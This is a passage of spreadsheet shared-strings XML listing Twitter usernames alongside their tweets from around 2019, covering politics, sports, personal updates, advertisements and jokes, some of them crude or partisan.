    <t>@MakePoland @DonaldJTrumpJr It is coming. Hillary has committed crimes for decades. After mccabe gets life the singing will begin. We know Singers are already singing</t>
  </si>
  <si>
    <t>Jorgie774312</t>
  </si>
  <si>
    <t>@HBICmaverick With men, It's a fine balance. They get scared if you need them too much and bothered if you don't need them enough. However, being direct with them is the best way to get what you want.</t>
  </si>
  <si>
    <t>dougpete</t>
  </si>
  <si>
    <t>Juul to suspend all U.S. advertising, names new CEO as vaping scrutiny intensifies https://t.co/RGCAhlVUnb via @flipboard</t>
  </si>
  <si>
    <t>Iexxiss</t>
  </si>
  <si>
    <t>What’s everyones favorite COD from the last 5 years?</t>
  </si>
  <si>
    <t>forward4US</t>
  </si>
  <si>
    <t>@BreitbartNews What happened to the Republican Party that believed in science?</t>
  </si>
  <si>
    <t>yencich</t>
  </si>
  <si>
    <t>@AaronWymer You're perfectly positioned to form a strongly held opinion!</t>
  </si>
  <si>
    <t>frantzthesaint</t>
  </si>
  <si>
    <t>I love the way things are headed.. my creative process has always been something that just bubbles over with no restraint...and its usually hard for me to actually pin down ideas to work with...but it looks like things are shaking out the way I want and I'm so excited!!</t>
  </si>
  <si>
    <t>realDanielEden</t>
  </si>
  <si>
    <t>@LewSpears Bruh we gonna believe the shit that gets put out by the Daily fucking Mail? Haahahahahahaha</t>
  </si>
  <si>
    <t>SmolderingPhoe1</t>
  </si>
  <si>
    <t>@mpukita They've walked on to the plantation 😄</t>
  </si>
  <si>
    <t>heynate88</t>
  </si>
  <si>
    <t>“I am always doing that which I can not do, in order that I may learn how to do it.” -Pablo Picasso #TuesdayMotivation #TuesdayMorning</t>
  </si>
  <si>
    <t>GeorgeM68340969</t>
  </si>
  <si>
    <t>A revival of Blood Syndicate from Milestone Media would be ideal in films or for a limited series run with a MA rating. https://t.co/vbT74NgoaZ</t>
  </si>
  <si>
    <t>helloimgabbie</t>
  </si>
  <si>
    <t>@Whatserface5 I'm being sincere. I don't believe you have the all knowing answer, but I'll gather any info I can and see if it helps!</t>
  </si>
  <si>
    <t>NusTrivia</t>
  </si>
  <si>
    <t>How to trade in or recycle your old iPhone in preparation for iPhone 11 - 9to5Mac https://t.co/TZxLGCPL9u #iPhone #GB #toMaccash #tech https://t.co/dr7dBPCtGR</t>
  </si>
  <si>
    <t>EverywhereErica</t>
  </si>
  <si>
    <t>@holypujoles We just made simple ones with soft scrambled eggs, sausage, and cheese! Nothing fancy, just something easy for a new cook.</t>
  </si>
  <si>
    <t>JustinPulitzer</t>
  </si>
  <si>
    <t>@Lindegren I liked &amp; still like booking profits... before they become losses. Historically, the stock has peaked several times on iPhone launches.</t>
  </si>
  <si>
    <t>wavy_gtfo</t>
  </si>
  <si>
    <t>PBnJs is one of the ultimate comfort foods</t>
  </si>
  <si>
    <t>Nasty_Bones</t>
  </si>
  <si>
    <t>Oh fuck me i just heard a little stand up comedy joke i want to animate skoll to and im rotting</t>
  </si>
  <si>
    <t>odd_dayz</t>
  </si>
  <si>
    <t>@RDCworld1 hey me and friend are having a agreement he says on bleach uryu is waisted potential but I don’t think is your thoughts? And Dylan’s too</t>
  </si>
  <si>
    <t>DailyFX</t>
  </si>
  <si>
    <t>Have you joined @DailyFX @facebook group yet? Discuss your #forex strategies and brush up on your skills with us here: https://t.co/jtY1G7g8yx https://t.co/WP8vW1N5WH</t>
  </si>
  <si>
    <t>mrsblondemama</t>
  </si>
  <si>
    <t>I’ve gotten irrationally angry over minuscule things that no one should be even thrown off about. I’ve wondered why my husband even still loves me... I lost our child, had a chemical pregnancy, &amp; haven’t been able to conceive since. I take my medicine, I track my abnormal cycles</t>
  </si>
  <si>
    <t>chrislongview</t>
  </si>
  <si>
    <t>"@KamalaHarris is trying to make the case to Iowa Democrats, who backed Barack Obama in 2008, to once again support a candidate who does not look like any previous nominee." I love local press. https://t.co/rR8w2RaQWF</t>
  </si>
  <si>
    <t>Ncorres</t>
  </si>
  <si>
    <t>U.S.-based accounting company H&amp;R Block has started serving as a middleman between cryptocurrency users and the Internal Revenue Service (IRS). This comes after the agency began sending letters to 10,000... https://t.co/Om5CwTuKzV</t>
  </si>
  <si>
    <t>JamesUHMB</t>
  </si>
  <si>
    <t>After careful consideration and research I have come to the conclusion that the device best suited to basically organise my entire life is a galaxy s6 and the device which will allow me to create, design and produce bangers on is an iPad.</t>
  </si>
  <si>
    <t>lovethoseknicks</t>
  </si>
  <si>
    <t>@Schmeelk @knickityknick @NYKFilmSchool @ZokaeiWorld @SKPearlman @JCMacriNBA @TheCohencidence @KevinOConnorNBA @ChrisVernonShow @FrenchKnicksPod @TheKnicksWall @HardKnicksLife @knickcity @ClarenceGaines2 It's tough to find any strong defensive units on the Knicks because management clearly values shot creation/scoring over defense and playmaking. Imagine Robinson, KP, Barrett, Mikal Bridges, &amp; Frank. That could VERY EASILY be our team. That's a top 5 defense on the way up</t>
  </si>
  <si>
    <t>LauraMcCullam</t>
  </si>
  <si>
    <t>My niece has been practicing cartwheels and handstands all day.... so I wanted to see if I could and the answer is YES #nottooldtohandstand x https://t.co/0QuGZgBTIt</t>
  </si>
  <si>
    <t>Starlight_McMil</t>
  </si>
  <si>
    <t>New Romanceaholic Magazine Issue! Welcome, Booklovers Romanceaholic Magazine is taking you one step closer to the book community, each issue of Romanceaholic pulls readers from the shadows and into the light.… https://t.co/4vu1bD9KF8</t>
  </si>
  <si>
    <t>DanielJeyn</t>
  </si>
  <si>
    <t>@TPCarney Left-wing people have been calling their opponents "racists" for a century, anyway. After the Stalinists abandoned their early 20th century racial-eugenics obsession, their inheritors in Marxist thought went full Franz Fanon. Those are the ones who instructed me.</t>
  </si>
  <si>
    <t>BadWilf</t>
  </si>
  <si>
    <t>Listening to @la_bonj and @BriggsNicholas’s beautiful tribute to Terrance Dicks on the latest @bigfinish podcast</t>
  </si>
  <si>
    <t>pakulak</t>
  </si>
  <si>
    <t>@WhiteHouse @FLOTUS @NYSE @Flaccid only cares about the green. Wonder how prison green will look on her?</t>
  </si>
  <si>
    <t>corr64</t>
  </si>
  <si>
    <t>@MissLaraBelle Oh goodness!! Goody Goody!! You constantly get more beautiful every time!! Thank you for sharing your beauty #LovelyLara 💕❤️💕❤️🌹🌹🌹</t>
  </si>
  <si>
    <t>GMLurie</t>
  </si>
  <si>
    <t>I just read that a men's group is trying to make #Palm #Sunday international #masturbation day.</t>
  </si>
  <si>
    <t>__donovan23</t>
  </si>
  <si>
    <t>2 months and 6 days for my 20th birthday 🥴</t>
  </si>
  <si>
    <t>sondro406</t>
  </si>
  <si>
    <t>@Alyssa_Milano Right !?! I actually agree with you @Alyssa_Milano for once! @CNN must be stopped , this platform of hate and lies they sit on needs to be taken down! 🤔🤔</t>
  </si>
  <si>
    <t>luluchui</t>
  </si>
  <si>
    <t>@taeiI_mooon THE HAIR. THE MASK. THE EARRING. THE CHAIN. THE CHOKER THING. MY GOD. DONT TOUCH ME RIGHT NOW. https://t.co/2eIkgc14VT</t>
  </si>
  <si>
    <t>jeffrueter</t>
  </si>
  <si>
    <t>@CornerkickSe That's about right. Toye's conversion rates have been truly exceptional compared to the expected results of his shots.</t>
  </si>
  <si>
    <t>DougRoling1</t>
  </si>
  <si>
    <t>@HumpDayHashTags My first twitter laugh of the day....a cheating mascot only in New England!!!</t>
  </si>
  <si>
    <t>h_powdermaker</t>
  </si>
  <si>
    <t>@finalAnswer_ This woman keeps having longer and longer dreams each night until she’s living whole days, weeks, and months in dreams and doctors can’t figure out what’s wrong with her</t>
  </si>
  <si>
    <t>DLakesSports</t>
  </si>
  <si>
    <t>@Super70sSports @bertsballpark The proper reply here is, "Norm Green sucks!"</t>
  </si>
  <si>
    <t>Handhalahh</t>
  </si>
  <si>
    <t>@aamullanee Sh, what is your opinion on the relevance of Islamic schools in the west? Are they necessary? Is it wise for a young person major in education or Eng or smth, to teach full time? I think about this alot, since I grew up without Islamic school/maktab.</t>
  </si>
  <si>
    <t>_lifewithari</t>
  </si>
  <si>
    <t>“if you think to much, you’ll create a problem that wasn’t there in the first place”</t>
  </si>
  <si>
    <t>WantThaBrownie</t>
  </si>
  <si>
    <t>@AbusivexxX @xx6LoLaMoDzzz9 O shit cat fight my money 💴 is on the pussy</t>
  </si>
  <si>
    <t>AmeliaBethB</t>
  </si>
  <si>
    <t>@funder I don’t think their is one. One of the scariest things he’s done is the attack on the media. Calling legitimate articles that don’t fit the narrative he likes “fake news.”</t>
  </si>
  <si>
    <t>Timangkey</t>
  </si>
  <si>
    <t>The cashier at liqourland asked for my id and just like that my day has been made. :) lol</t>
  </si>
  <si>
    <t>toothmanelite</t>
  </si>
  <si>
    <t>@RudiTuesdays @gtconway3d The media and Dems leave out Trump's comments on Crowd Strike on purpose. Once again the fake news media running cover for the Dems. Goes to show deep state in action. And there's this. https://t.co/opeoFNo0T7</t>
  </si>
  <si>
    <t>AdeleBonaccolta</t>
  </si>
  <si>
    <t>@WSJ if they want the shades down, why have a seat by the window? unless the sun is very strong and the shade needs to be down.</t>
  </si>
  <si>
    <t>TheFloppyMudkip</t>
  </si>
  <si>
    <t>Too many to @ but thanks to anyone I played or talked to :)</t>
  </si>
  <si>
    <t>TheatreOfMySoul</t>
  </si>
  <si>
    <t>@Raider_Hayter Did they say how long it might be for a liver from a deceased person?</t>
  </si>
  <si>
    <t>lee_m987</t>
  </si>
  <si>
    <t>@AmazonHelp I have tried contacting them 12 times. No response. It's a DPD order... Not putting order number on here but happy to DM it.</t>
  </si>
  <si>
    <t>sfcougars</t>
  </si>
  <si>
    <t>USF's Brey Baltazar w/ the shot and Cali Geiger w/ the follow https://t.co/93hGqHa5Oq</t>
  </si>
  <si>
    <t>annerobotham</t>
  </si>
  <si>
    <t>@gunnerblog @mertesacker The BFG FA Cup Final vs Chelsea. Which is what it should forever be known as. Hardly played all year, defensive injury crisis? Bossed the F#$&amp;)#* Game - and Costa for good measure.</t>
  </si>
  <si>
    <t>sevenneuter</t>
  </si>
  <si>
    <t>@MessiahX5 “The fact that the speed of gravitational waves is equal to the speed of electromagnetic waves is simply because they both travel at the speed of information,” Thus The Term "Gravity of the Situation" https://t.co/s9s3MzIUGL</t>
  </si>
  <si>
    <t>CedricSeanBrad</t>
  </si>
  <si>
    <t>@KentyRosse Brianna, Bump over my head. She was yelling and screaming. She is trying to make me her submissive, Kenty. What should I do?</t>
  </si>
  <si>
    <t>K0NIGDRAWS</t>
  </si>
  <si>
    <t>@sylessae This is a message that needs to continue being spread! Art takes time and hard work like everything else. Someone once asked Picasso how he could draw something in just 10 minutes and he replied, "I didn't. It took me a lifetime to be able to do it in 10 minutes."</t>
  </si>
  <si>
    <t>TobiasFlint</t>
  </si>
  <si>
    <t>@solomongeorgio It's all fun and games until the alt right strikes back &amp; starts publicly executing mimes.</t>
  </si>
  <si>
    <t>philhawksworth</t>
  </si>
  <si>
    <t>@markboulton @aexmo @Netlify Are there lots of either un-cacheable (perhaps externally sourced and somehow deemed unique) or unoptimised (I imagine not from you, sir!) assets as part of each deploy?</t>
  </si>
  <si>
    <t>FISGlobal</t>
  </si>
  <si>
    <t>Learn why banks and credit unions should want to learn what makes Gen Xers unique and what they want from a #bankingrelationship. For more, read on in this @FinancialBrand article from FIS’ @MariaSchuld1 on this key insight from the FIS 2019 #PACEreport: https://t.co/Hgxl0f9oe0</t>
  </si>
  <si>
    <t>LucyStag</t>
  </si>
  <si>
    <t>Narrative film and Instagram have made it impossible for me to truly believe in the reality of super8 films.</t>
  </si>
  <si>
    <t>Daniel25360786</t>
  </si>
  <si>
    <t>@CroneyTiffany Hey dm me for $2500 weekly allowance</t>
  </si>
  <si>
    <t>joshsmilk</t>
  </si>
  <si>
    <t>@joshuadun you are too pure for this world</t>
  </si>
  <si>
    <t>Kr8zKatL8y</t>
  </si>
  <si>
    <t>@McCreadyForNC 1/I'm upset that polling places were not adequately publicized. Here I am a phone worker for Dan &amp; I didn't know my reg polling place was not where I was supposed to vote! I hope that didn't happen to other voters. I was the ONLY Dem at Trump's rally last nite in Fayetteville..</t>
  </si>
  <si>
    <t>philippemondrag</t>
  </si>
  <si>
    <t>"Just put your feet on the ground" Ground yourself and root for yourself and others "Sleep when you're dead" Often we lose sleep over the things that have been and arent anymore. Things that didn't hold us as we… https://t.co/QyTV3m9fsi</t>
  </si>
  <si>
    <t>GrassrootsSpeak</t>
  </si>
  <si>
    <t>@laauger @kate_littleton Trust me I don’t trust Mitch I think Mitch has a plan And I don’t think Mitchs plan includes Trump I think Mitch will dump Trump</t>
  </si>
  <si>
    <t>business</t>
  </si>
  <si>
    <t>Denmark is about to become a test case for what happens when banks start charging a lot of customers to store their money https://t.co/fQ6H0fKy0b</t>
  </si>
  <si>
    <t>ncackerman</t>
  </si>
  <si>
    <t>@dw_everton Those are a select and powerful combination of skills.</t>
  </si>
  <si>
    <t>ThwipAndQuip</t>
  </si>
  <si>
    <t>@ill_be_tails @EwdatsGROSS Or just less destructive than the rest 😂</t>
  </si>
  <si>
    <t>tinyycee</t>
  </si>
  <si>
    <t>yooo but the kicks I purchased today 😍</t>
  </si>
  <si>
    <t>fondi64</t>
  </si>
  <si>
    <t>@PaulMason2 @FilomenaTassi @BobBratina @JasperKujavsky @Jen_Stebbing @BUggenti MP Bratina supports steel industry &amp; pensioners. Stelco got $49.9 million from the Strategic Investment Fund (SIF). ArcellorMittal Dofasco got $49.9 million from SIF</t>
  </si>
  <si>
    <t>TheMikeDonovan</t>
  </si>
  <si>
    <t>Eric Church is the guest picker on @CollegeGameDay. Unless you are watching on @ESPNDeportes where the guest picker is Enrique Iglesias.</t>
  </si>
  <si>
    <t>ednaciurleo234</t>
  </si>
  <si>
    <t>@realDonaldTrump The #Whistleblower is ready to testify. You are going to jail. https://t.co/P3D6NONQFJ</t>
  </si>
  <si>
    <t>Tedd_Heating</t>
  </si>
  <si>
    <t>A university study has found it takes up to twice the amount of time to heat water to the desired temperature without a CombiSave valve fitted, and also uses up to 56% more water. https://t.co/d4zctTX2aG</t>
  </si>
  <si>
    <t>concretism_mus</t>
  </si>
  <si>
    <t>@Dick_and_Stew @anti_worlds @rookfilms @richard_littler @Scarfolk Just seen this comment on the YouTube teaser trailer. Almost like the music and sound guy did it deliberately. https://t.co/sRMt4VJ0y5</t>
  </si>
  <si>
    <t>HTD_38</t>
  </si>
  <si>
    <t>@TropicSoundInWA Yea! Got a full schedule today. 🤦‍♂️ my dumb butt got 3 photos gig today. The best one is last bc it involved free food, alcohol and networking.</t>
  </si>
  <si>
    <t>gbellseattle</t>
  </si>
  <si>
    <t>Pete Carroll has nothing (yet) to say on #Seahawks re-signing Jamar Taylor as possible nickel DB. But imminent signing likely related to new shoulder injury for rookie Ugo Amadi, who was the first nickel Sunday. Carroll infers Amadi could be out a while.</t>
  </si>
  <si>
    <t>kdramadramapop</t>
  </si>
  <si>
    <t>Maybe you need something to fall asleep to, maybe you need a good cry, maybe you need to catch your breath/mediate for an hour, or maybe you just want to listen to a great playlist. 👉🏾♫ sleep like a winter bear||soft bts sleep playlist ♫ https://t.co/La9bYlm4fY #BTS @BTS_twt💜</t>
  </si>
  <si>
    <t>SirhcGotUchies</t>
  </si>
  <si>
    <t>why you switch when you aint had to , i didnt have you but i had you 🕊</t>
  </si>
  <si>
    <t>IDontGive_AFukk</t>
  </si>
  <si>
    <t>Can’t wait to be off 🙄🙄</t>
  </si>
  <si>
    <t>plutonstation</t>
  </si>
  <si>
    <t>nonononononono Do Not Want To See Threads About Conversion Therapy Camps Because I Almost Got Sent To One</t>
  </si>
  <si>
    <t>SVSalon</t>
  </si>
  <si>
    <t>@realDonaldTrump Something’s crazy here but it ain’t the media. Get this man a mirror</t>
  </si>
  <si>
    <t>OpinionatedEYE</t>
  </si>
  <si>
    <t>@kim @DC2CA @JessesLaw @girlsreallyrule @NickMiroff I go back and forth between labeling myself as a masochist or hopeless optimist. Lol</t>
  </si>
  <si>
    <t>POETPhylDeGreat</t>
  </si>
  <si>
    <t>@Patrick68148446 @kitchen5203 @betobe14999808 I don’t know if he belongs in America, but he definitely does not belong in the White House. All the nefarious things that gets swept under the rug is unprecedented. I hope supporters with children don’t treat them with the “they can do no wrong” attitude like they have with DT.</t>
  </si>
  <si>
    <t>kevinlovestech</t>
  </si>
  <si>
    <t>Chilliwack woman wins right to medically assisted death after three-year court battle #MAID https://t.co/FIw1j3DHL0 via @ParksvilleNews</t>
  </si>
  <si>
    <t>HawkInATX</t>
  </si>
  <si>
    <t>@TGDavis_13 @OldVet48 @beachgirl_karen @ananavarro Presidents don't pass bills, and Congress doesn't define the prerequisites to become President without amending the Constitution. But that's just facts, so I guess they don't matter.</t>
  </si>
  <si>
    <t>Johnny70250027</t>
  </si>
  <si>
    <t>@kaylesmarshall @INSNeurosurgery @calan_mathieson @patrick_statham @MSNNeuro @WillStewNeuro be ready very soon. Patients still alive today are mostly from the "mesenchymal" group. This group has low "PD1." PD1 is a chemical released by the tumor to neutralize white blood cells/vaccine. High PD1 https://t.co/n7MuFOindo</t>
  </si>
  <si>
    <t>RennyOffDaHenny</t>
  </si>
  <si>
    <t>Can’t wait for the game to drop... cuz the beta really is chalked for me 😕</t>
  </si>
  <si>
    <t>natesstein</t>
  </si>
  <si>
    <t>@megan_bibby I mean Dean shaved his whole face for her it’s the least she could do</t>
  </si>
  <si>
    <t>RtaFleet</t>
  </si>
  <si>
    <t>Help your fleet staff adapt to new mobile technology by using these tips. https://t.co/a55OPLm130</t>
  </si>
  <si>
    <t>Satorical</t>
  </si>
  <si>
    <t>@b7283sosu @PDXToddDiskin @MLS @thesoccerdon He ignored a problem for months that could yet make the league implode, until MLS was embarrassed on national TV. @thesoccerdon is not only a quisling, he's oblivious to business risk. I hope owners are smart enough to have started looking for his replacement.</t>
  </si>
  <si>
    <t>samjalexander_</t>
  </si>
  <si>
    <t>Little tribute I made for the great man Rahkeem Cornwall on Day 1 of his Test debut #INDvWI #WIvIND https://t.co/Mm9sEbFvKZ</t>
  </si>
  <si>
    <t>noverdose</t>
  </si>
  <si>
    <t>@TheBeatWithAri His civilian money laundering activities should be more than enough to put him away but too many media outlets are wary or too lazy to do the deep dive reporting on what is already publicly available evidence . Looking at you @nytimes</t>
  </si>
  <si>
    <t>typicaldolt</t>
  </si>
  <si>
    <t>@jackallisonLOL what in the absolute fuck is a citizen kane for incels</t>
  </si>
  <si>
    <t>skuffel_waow</t>
  </si>
  <si>
    <t>A new weather alert has been issued for our area. For more details: https://t.co/iNeYQQ2z3I https://t.co/q2NoaSxXBV</t>
  </si>
  <si>
    <t>937aaron</t>
  </si>
  <si>
    <t>@DougLesmerises Ironic that one of the least handsy fouls of his.</t>
  </si>
  <si>
    <t>WorcesterHour</t>
  </si>
  <si>
    <t>Need a reliable Printer? Contact #WorcestershireHour partner @SBPrintWorcs for friendly help &amp; advice with your design &amp; print requirements #AD</t>
  </si>
  <si>
    <t>pozvibes4u</t>
  </si>
  <si>
    <t>@ATTHelp please keep Fox Kansas KSAS on the air! We lost that channel and NBC &amp; just got them back. All my services are with you. I will sign up elsewhere if this continues. Give me what I pay for.</t>
  </si>
  <si>
    <t>KratomKiller</t>
  </si>
  <si>
    <t>My favorite part of the day is shoveling my neighbors dogshit back into his yard</t>
  </si>
  <si>
    <t>kelswid</t>
  </si>
  <si>
    <t>@hannahschaef @LoganJEvans you have to tell me which billie eilish song it’s the law</t>
  </si>
  <si>
    <t>sullybach</t>
  </si>
  <si>
    <t>@JesseKellyDC It's more akin to lasagna than pizza.</t>
  </si>
  <si>
    <t>Bob_Devonshire</t>
  </si>
  <si>
    <t>Photos from the Solanco Fair Parade. #solancofair #fair #fairseason #parade #solancofairparade #fall #quarryville #lancastercounty #queen #marchingband #farm #farmlife @LancasterOnline https://t.co/gh5d7NkFOn</t>
  </si>
  <si>
    <t>PHXAthletics</t>
  </si>
  <si>
    <t>Southworth and Lion come through in the clutch in the finals double match to lift the Firebirds to a 4-3 win over Bishop Grimes in Girls 🎾</t>
  </si>
  <si>
    <t>BecomingOneComm</t>
  </si>
  <si>
    <t>I am raising money for Project Job Ready. Our mission is to provide programs, resources, and support for previously incarcerated citizens to reintegrate successfully into their communities. #2ndChances #ReturningCitizens Click to Donate: https://t.co/IML4DhZkcQ via</t>
  </si>
  <si>
    <t>bramleyjuniorY6</t>
  </si>
  <si>
    <t>Y6 spellings this week - test on Thursday due to Crucial Crew. Times tables focus - 4s. Remember those super sized and super small facts @BramleyJunior https://t.co/xChB0kpIbV</t>
  </si>
  <si>
    <t>redavian</t>
  </si>
  <si>
    <t>Go see @HustlersMovie then get a lap dance, go throw some 5s 10s 20s on a stage, look up an escort, follow their booking rules, tip THEM Basically go support an IRL sex worker</t>
  </si>
  <si>
    <t>Ministerofblog</t>
  </si>
  <si>
    <t>@realDonaldTrump @GOPLeader 💥And shrinking by the hour............. https://t.co/NLqb9HKgt1</t>
  </si>
  <si>
    <t>MollieC9199</t>
  </si>
  <si>
    <t>Happy Birthday @MazzelloJoe AKA #JohnDeacon in @BoRhapMovie and Tim Murphy in #JurassicPark! Lots of love! 😘❤️❤️❤️ https://t.co/ZTBYhMG4nC</t>
  </si>
  <si>
    <t>AdamSinger</t>
  </si>
  <si>
    <t>@seth586 Can always add some vodka to those</t>
  </si>
  <si>
    <t>307Chivo66</t>
  </si>
  <si>
    <t>@MicheleAmerica2 “Then I learned to play some lead guitar, I was underage in this funky bar and I stepped outside to smoke myself a J...” #7 🎸🥁🎺🎷🎼🤘🏼❤️</t>
  </si>
  <si>
    <t>tmj_sjc_labor</t>
  </si>
  <si>
    <t>Looking to join Kelly Services, UPS (@DanieAtUPSjobs), or OnTrac (@OnTrac_Shipping)? View 41 openings from these companies and more.</t>
  </si>
  <si>
    <t>peter_dunkley</t>
  </si>
  <si>
    <t>@stupidcnut @pinkbicyclegirl @MrHarryCole What? The only one drunk here appears to be you.</t>
  </si>
  <si>
    <t>mkshane</t>
  </si>
  <si>
    <t>15 Pages A Day – Take the Pledge with Joy Lenz https://t.co/qPGlH7v90G</t>
  </si>
  <si>
    <t>paula4buttigieg</t>
  </si>
  <si>
    <t>@Cats4Pete @ThePeteEffect The size of my @PeteButtigieg photo collection is as limitless as my desire for him to #WinTheEra 😉 I love that even his facial expressions make my day and give me hope. https://t.co/S55rmCNJrX</t>
  </si>
  <si>
    <t>julie719</t>
  </si>
  <si>
    <t>@EsotericCD @bendreyfuss I have a dedicated pair of scissors for when the vacuum gets so clogged with my hair that the bottom of it just looks like a spool of brown thread</t>
  </si>
  <si>
    <t>Dinkeldash</t>
  </si>
  <si>
    <t>@CrescentForest Dude, this is a fandom. Of course there’s a need to argue about headcanon. I’m not saying you have to accept mine, but to reject it without an explanation is pushing all my nerd buttons tbh. https://t.co/tLmRC6AUO3</t>
  </si>
  <si>
    <t>iamtenika</t>
  </si>
  <si>
    <t>Skinny Banton for the WIN!!</t>
  </si>
  <si>
    <t>ToppedByTaylor</t>
  </si>
  <si>
    <t>@abelliams My heart. Mwah. Eating cereal and watching tv.</t>
  </si>
  <si>
    <t>BlackDollarsORG</t>
  </si>
  <si>
    <t>@Passionlanay Reserve your cabins today for the 2020 Urban Cruise Weekend. Tag-A-Friend ==&gt;&gt; https://t.co/g9kAUm55zs #cruise #precruise #MardiGras #NOLA #BlackTwitterMovement #BlackTwitter #BlackPeople https://t.co/hyegzfQCNU</t>
  </si>
  <si>
    <t>CyrusShares</t>
  </si>
  <si>
    <t>Worried about "US debt to China"? Guess what? Soon esthere wouldn't be any US treasuries left in the Chinese reserve. Their government is blowing them and needs to dump even more of it just to prevent a recession. https://t.co/v7yjnTVMdl</t>
  </si>
  <si>
    <t>sturgessart</t>
  </si>
  <si>
    <t>New artwork for sale! - "DESERT STORM" - https://t.co/ZmzQnOdBXt @fineartamerica https://t.co/HGDZHrvL5W</t>
  </si>
  <si>
    <t>InquestOfTruth</t>
  </si>
  <si>
    <t>@CNN Look! @cnn dug up and PAID a old, unimportant NOAA employee/Trump hater to keep a nonsensical/ridiculous story alive. Shocking. 😂😂😂 “This is CNN. This is Propaganda.” #MAGA</t>
  </si>
  <si>
    <t>cassielafasto</t>
  </si>
  <si>
    <t>@Zo_bo_fo_sho I find this unacceptable 😖 I hated the heat in Texas, I cannot imagine it in Nevada!!!</t>
  </si>
  <si>
    <t>Lindacu80393849</t>
  </si>
  <si>
    <t>@JohnMcGeever70 @votesamuelwill1 This should be ample reason to not vote for him</t>
  </si>
  <si>
    <t>MGunst26</t>
  </si>
  <si>
    <t>Dear every person in my fantasy leagues: today is your chance to take advantage of my Eagles bias. Shoot your shot.</t>
  </si>
  <si>
    <t>Mary_Morstan_</t>
  </si>
  <si>
    <t>@LoyalWatson "You're not my boss." She murmured, shifting uncomfortably before looking up to him with a tired smile.</t>
  </si>
  <si>
    <t>Rob_PHE</t>
  </si>
  <si>
    <t>That cold air in the apt hit different in middle of the night</t>
  </si>
  <si>
    <t>LaurenIpsome</t>
  </si>
  <si>
    <t>Just in case you like to take your game of D/s with a generous side of romance; follow the adventure as both Master and servant must learn the different meanings of "restraint." https://t.co/N1PqE9IxAe https://t.co/rfPC3pVDbQ</t>
  </si>
  <si>
    <t>Roni19502</t>
  </si>
  <si>
    <t>@gingerlynn96 @TheTalkCBS Yes, but back when you were in school, parents/schools were better at controlling their kids. Now the kids are in control. I agree that they could have come up with a better idea.</t>
  </si>
  <si>
    <t>JakaylaHollie</t>
  </si>
  <si>
    <t>@whateverraee he bringing up other bands and shit boy bye 💀tststsssss</t>
  </si>
  <si>
    <t>therealkuri</t>
  </si>
  <si>
    <t>@Greyseeker I envy your life. I keep looking at my eaves and thinking I should do that. When I am not tired from work.</t>
  </si>
  <si>
    <t>OrlandoDefiance</t>
  </si>
  <si>
    <t>@Courtstar413 @FauxPelini @SlaterNFL @AB84 Super Bowls mean money. Not only for gameplay but with all of the advertisers and marketers that want to use your image and the talk show circuit and the sales of your gear, it can make up the difference over time.</t>
  </si>
  <si>
    <t>QWIKET_FEED</t>
  </si>
  <si>
    <t>Daily Wire: Pompeo Hints At What U.S. Response Will Be To Iranian Attacks On Saudi Arabia https://t.co/U2Dig6NI7o</t>
  </si>
  <si>
    <t>KATVElicia</t>
  </si>
  <si>
    <t>The @UAMonticello cheerleaders are helping @KATVAnsley with her quick change! #kickofftocollege https://t.co/yLSu5X9edP</t>
  </si>
  <si>
    <t>Radar_Assistant</t>
  </si>
  <si>
    <t>HOLDING PATTERN ALERT : At time Fri Sep 27 09:24:04 2019 #LNI736 was likely to be holding at FL101 15nm from MD Manado_NDB_ID near Pulau Manado Tua, Manado, Sulut, NKRI #AvGeek #holding https://t.co/UGgYTvVL3M https://t.co/ztRo0zAYYS</t>
  </si>
  <si>
    <t>tmj_lax_sales</t>
  </si>
  <si>
    <t>Check out our 428 latest #Sales openings in #LosAngeles by clicking the link in our bio.</t>
  </si>
  <si>
    <t>REECEALJ</t>
  </si>
  <si>
    <t>Falling asleep during daylight and waking up in the dark&lt;&lt;&lt;&lt;&lt;</t>
  </si>
  <si>
    <t>Tamara_Lasalle</t>
  </si>
  <si>
    <t>"Walk authentically in who God created you to be and what He has gifted you to do and let him work out the rest" -Tamara L. Jones Photo by Rhonda Naicole Curry #books #photos #empowerment #Christianity #sisterhood https://t.co/nGhUacZlK8</t>
  </si>
  <si>
    <t>stoich1</t>
  </si>
  <si>
    <t>This is one of the best mid-table Premier League games I've seen 👏👏</t>
  </si>
  <si>
    <t>thiccmom3</t>
  </si>
  <si>
    <t>I would tell @nickjonas happy birthday, but he didn’t open any of the snaps I sent him the day I went to his concert so... 🙄</t>
  </si>
  <si>
    <t>sutty1977</t>
  </si>
  <si>
    <t>@BraveheartCH Very knowledgeable about the game , great listen , always honest</t>
  </si>
  <si>
    <t>brettheng</t>
  </si>
  <si>
    <t>@ACEWillJudgeYou @NicolaScottArt 🌀 Ride the spiral to the end 🌀 https://t.co/c1kgPpHMis</t>
  </si>
  <si>
    <t>jackiexsanz</t>
  </si>
  <si>
    <t>Y’all pray for me fore I just risked it all</t>
  </si>
  <si>
    <t>ValerieSchlesi4</t>
  </si>
  <si>
    <t>@BridgetSterli19 Pop up please???</t>
  </si>
  <si>
    <t>taptapinc</t>
  </si>
  <si>
    <t>I cannot breathe when I'm not on the move. I can only suffocate each experiment till I find an end. #WednesdayThoughts</t>
  </si>
  <si>
    <t>AskDyson</t>
  </si>
  <si>
    <t>@jimmyrugs How odd! 🤔 Please feel free to DM us with more details, and we can take a look into this for you. https://t.co/Bk4DFJvnUu</t>
  </si>
  <si>
    <t>Lance_News</t>
  </si>
  <si>
    <t>The magnificent #Yokaham stadium takes centre stage again for the big Celtic rivalry between Six Nations foes #Ireland &amp; #Scotland here at #RWC2019 Conditions: overcast with rain expected later. That’ll suit Sexton more than Russell. ☔️ #IREvSCO https://t.co/81zv29EImb</t>
  </si>
  <si>
    <t>T1Diabolical</t>
  </si>
  <si>
    <t>@livvyinabox This has really cracked me up!!</t>
  </si>
  <si>
    <t>donovanhollis</t>
  </si>
  <si>
    <t>@cbfowler did you just call Auburn “the tide”?</t>
  </si>
  <si>
    <t>OurRepublic12</t>
  </si>
  <si>
    <t>@AngrierWHStaff The last time we cut taxes and went to war was Bush in 2002. Deficit skyrocketed!</t>
  </si>
  <si>
    <t>cje3116</t>
  </si>
  <si>
    <t>@teachergoals But a lot do and it shows... in the student achievement and behavior</t>
  </si>
  <si>
    <t>TavernNightlife</t>
  </si>
  <si>
    <t>The @deepeddyvodka #Photobooth is BACK at taverninthesquareallston some of these folks are getting BLACKCARDS ⬛️‼️ Make sure you TAG US, maybe you’ll win one too? #TavernAllston #Boston #Allston #Brighton… https://t.co/qgyHKu2wta</t>
  </si>
  <si>
    <t>Haplessbeignet</t>
  </si>
  <si>
    <t>This beignet will be able to bite back.... @infinite_scream</t>
  </si>
